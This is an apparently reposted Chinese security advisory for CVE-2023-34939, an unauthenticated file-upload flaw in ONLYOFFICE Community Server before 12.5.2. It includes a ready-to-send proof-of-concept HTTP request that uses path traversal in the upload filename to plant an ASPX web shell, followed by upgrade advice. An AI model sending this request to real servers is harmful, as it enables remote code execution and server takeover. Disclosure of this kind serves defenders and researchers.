CTF导航 CTF导航

OnlyOffice Community Server文件上传漏洞

渗透技巧 10个月前 admin
785 0 0
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。

漏洞简述

Onlyoffice 是一款全能的开源写作办公套件。是由俄罗斯公司“新通信技术”的子公司Ascensio System SIA开发的免费软件办公套件和协作应用程序生态系统,总部位于拉脱维亚的里加。它具有在线文档编辑器,文档管理平台,企业沟通,邮件和项目管理工具。CVE-2023-34939,当ONLYOFFICE Community Server存在任意文件上传漏洞,当ONLYOFFICE Community Server的论坛存在讨论话题时,未经授权的攻击者可上传任意文件并导致任意代码执行,从而控制服务器。


影响产品

ONLYOFFICE Community Server< 12.5.2


利用条件

需要ONLYOFFICE Community Server的论坛模块存在讨论话题。


漏洞POC
POST /UploadProgress.ashx?submit=ASC.Web.UserControls.Forum.ForumAttachmentUploadHanler,ASC.Web.Community&SettingsID=11111111-1111-1111-1111-111111111111&ThreadID=3&UserID=11111111-1111-1111-1111-111111111110 HTTP/1.1
Host: REDACTED
Content-Length: 121
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123

------WebKitFormBoundary123
Content-Disposition: form-data; name="files[]"; filename="../../../../../../../../../../../../../WebStudio/2023-34939.aspx"
Content-Type: application/asp

ASPX SHELL
------WebKitFormBoundary123--

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。


修复建议
官方已发布新版本,升级至12.5.2
https://github.com/ONLYOFFICE/CommunityServer/releases
参考
https://github.com/firsov/onlyoffice/tree/main作者:firsov如有侵权,请联系删除。




原文始发于微信公众号(Hacker文库):OnlyOffice Community Server文件上传漏洞

版权声明:admin 发表于 2023年7月3日 下午5:00。
转载请注明:OnlyOffice Community Server文件上传漏洞 | CTF导航

相关文章

Yakit+Melto实现API安全扫描
admin
142
MyBB < 1.8.25 (CVE-2021-27279) XSS
admin
747
代码审计公开课|从沙盒逃逸到RCE
admin
375
集权设施攻防兵法:实战攻防之vCenter篇
admin
357
第51篇:某运营商外网打点到内网横向渗透的全过程
admin
608
SharpViewStateShell v1.0.2
admin
606

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

CVE-2024-4040
0
見落としがちなURL正規化によるパストラバーサル
0
CVE-2024-21111 – Local Privilege Escalation in Oracle VirtualBox
0
kkFileView文件上传导致远程代码执行漏洞
0
Ghidra RCE 漏洞分析
0
每日安全动态推送(4-29)
0
Jumpserver 数据恢复之所有服务器权限
0
每日安全动态推送(4-28)
0
[代码审计] 某盗U/发卡系统 不知道是几day
0
Cookie-Monster – BOF To Steal Browser Cookies & Credentials
0